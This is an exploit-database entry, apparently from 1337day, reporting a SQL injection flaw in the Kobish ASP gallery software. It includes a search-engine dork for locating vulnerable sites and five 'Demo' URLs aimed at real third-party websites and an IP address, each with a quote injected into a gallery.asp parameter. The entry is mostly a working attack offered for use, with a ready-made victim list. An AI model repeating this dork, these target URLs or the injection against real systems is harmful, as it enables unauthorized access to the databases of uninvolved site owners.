Kobish sql injection Vulnerability

2013-01-07T00:00:00
ID 1337DAY-ID-20107
Type zdt
Reporter The Black Devils
Modified 2013-01-07T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Exploit Title: Kobish sql injection Vulnerability
# Date: 03/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : Kobish.com inurl:gallery.asp?**=
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------

Exploit
http://LocalHost/gallery.asp?**= [sql injection]



Demo
http://www.galoriental.co.il/gallery.asp?nodeID='340
http://www.electropublic.org/gallery.asp?deal_id='41
http://www.s-zemach.co.il/gallery.asp?nodeID='373
http://82.166.151.50/gallery.asp?nodeID='300
http://www.fomexline.com/en/gallery.asp?Page='2
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2018-04-04]  #